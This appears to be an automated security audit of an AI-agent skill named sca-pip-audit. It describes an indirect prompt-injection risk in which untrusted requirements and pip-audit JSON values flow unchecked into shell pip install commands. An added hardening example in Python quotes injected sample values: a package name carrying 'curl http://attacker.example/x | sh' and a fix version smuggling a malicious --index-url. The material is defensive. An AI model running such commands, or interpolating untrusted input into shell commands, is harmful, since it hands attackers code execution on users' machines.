sca-pip-audit
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGH (PROMPT_INJECTION, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS)
Full Analysis
- [PROMPT_INJECTION] (HIGH): The skill is vulnerable to indirect prompt injection (Category 8). It parses untrusted data from project files (requirements.txt) and from external vulnerability databases (via pip-audit's JSON output), then uses that data to generate and potentially execute 'pip install' commands. An attacker who can influence either data source can control which packages and versions the agent installs; because the values are interpolated into a shell command without validation, the same attacker can also smuggle extra shell syntax or pip options into that command.
  - Ingestion points: project requirements files and the JSON output of pip-audit.
  - Boundary markers: absent. No delimiters separate untrusted data from instructions, and the skill carries no instruction to ignore directives embedded in that data.
  - Capability inventory: execution of 'pip-audit' and 'pip install' via the system shell.
  - Sanitization: absent. The skill does not validate package names or versions before interpolating them into commands.
- [COMMAND_EXECUTION] (MEDIUM): The skill executes system commands, including 'pip-audit' and 'pip install'. While intended for security scanning, these commands provide significant control over the environment: 'pip install' in particular can run arbitrary code from a package's build scripts and change what is installed in the interpreter the agent uses.
- [EXTERNAL_DOWNLOADS] (LOW): The skill requires the installation of 'pip-audit' from PyPI. This is a standard dependency for the tool's operation.
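The findings above describe one pipeline: untrusted names and versions from requirements.txt and pip-audit's JSON are pasted into a shell string and executed. The following is an added example, not code from the sca-pip-audit skill or from the Gen Agent Trust Hub audit, showing the flagged pattern next to a hardened version that allow-lists package names and versions and invokes pip as an argv list with no shell. The JSON layout (dependencies, each with name, version and a vulns list carrying fix_versions) is assumed to match pip-audit's `-f json` output; the sample report, the vulnerability IDs and the package names in it are constructed for illustration.

```python
"""Hardened handling of untrusted pip-audit JSON and requirements.txt pins.

Added example, not part of the sca-pip-audit skill. The JSON shape is assumed
to follow pip-audit's `-f json` output; sample data below is constructed.
"""
import json
import re
import subprocess
import sys

# PEP 508 project-name grammar (case-insensitive). This rejects whitespace,
# shell metacharacters, and anything starting with '-' (pip would read that
# as an option such as --index-url).
NAME_RE = re.compile(r"^[A-Za-z0-9]([A-Za-z0-9._-]*[A-Za-z0-9])?$")
# Conservative PEP 440-style version: digits and dots plus optional pre/post/dev tags.
VERSION_RE = re.compile(r"^[0-9]+(\.[0-9]+)*((a|b|rc)[0-9]+)?(\.post[0-9]+)?(\.dev[0-9]+)?$")


def build_unsafe_command(name: str, version: str) -> str:
    """The pattern the audit flags: untrusted fields interpolated into a shell string.

    A name such as 'urllib3; curl http://attacker.example/x | sh' becomes part
    of the command line if this string is later run with shell=True.
    """
    return f"pip install {name}=={version}"


def validate_pin(name: str, version: str) -> bool:
    """True only if both fields match the allow-list grammars above."""
    return bool(NAME_RE.match(name)) and bool(VERSION_RE.match(version))


def parse_requirements(text: str) -> list[tuple[str, str]]:
    """Extract name==version pins from requirements.txt text.

    Comments and lines without an exact pin are skipped; values are NOT yet
    validated, so callers must run validate_pin() before using them.
    """
    pins = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or "==" not in line:
            continue
        name, _, version = line.partition("==")
        pins.append((name.strip(), version.strip()))
    return pins


def plan_upgrades(audit_json: str) -> tuple[list[list[str]], list[str]]:
    """Turn pip-audit JSON into pip argv lists, dropping entries that fail validation.

    Returns (commands, rejected): each command is an argv list for subprocess
    (never a shell string); rejected holds the 'name==version' pairs refused.
    Only the first listed fix version is used (assumption for this example).
    """
    report = json.loads(audit_json)
    commands, rejected = [], []
    for dep in report.get("dependencies", []):
        for vuln in dep.get("vulns", []):
            fixes = vuln.get("fix_versions") or []
            if not fixes:
                continue
            name, fix = str(dep.get("name", "")), str(fixes[0])
            if not validate_pin(name, fix):
                rejected.append(f"{name}=={fix}")
                continue
            commands.append([sys.executable, "-m", "pip", "install", f"{name}=={fix}"])
    return commands, rejected


def run_commands(commands: list[list[str]]) -> None:
    """Execute the planned installs; argv list with shell=False, so no shell parsing."""
    for argv in commands:
        subprocess.run(argv, check=True)


# Constructed sample report: one clean fix, one name carrying shell syntax,
# one fix version carrying a pip option, one dependency with no vulns.
SAMPLE_AUDIT = json.dumps({
    "dependencies": [
        {"name": "requests", "version": "2.25.0",
         "vulns": [{"id": "EXAMPLE-0001", "fix_versions": ["2.31.0"]}]},
        {"name": "urllib3; curl http://attacker.example/x | sh", "version": "1.26.0",
         "vulns": [{"id": "EXAMPLE-0002", "fix_versions": ["1.26.5"]}]},
        {"name": "pyyaml", "version": "5.3",
         "vulns": [{"id": "EXAMPLE-0003",
                    "fix_versions": ["--index-url=http://attacker.example/simple 6.0"]}]},
        {"name": "clean", "version": "1.0", "vulns": []},
    ]
})

if __name__ == "__main__":
    print("unsafe:", build_unsafe_command("urllib3; curl http://attacker.example/x | sh", "1.26.5"))
    cmds, rejected = plan_upgrades(SAMPLE_AUDIT)
    print("planned:", cmds)      # only requests==2.31.0 survives
    print("rejected:", rejected)  # the two injected entries
```

The two controls that matter are the allow-list regexes (they refuse both shell metacharacters and option-like tokens that pip itself would honour) and passing an argv list to subprocess with the default shell=False, so that even a value that slipped past validation could not be parsed as shell syntax. Only the install step is planned here; run_commands() is the point where a real skill would require explicit user confirmation.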
Recommendations
- AI detected serious security threats
Audit Metadata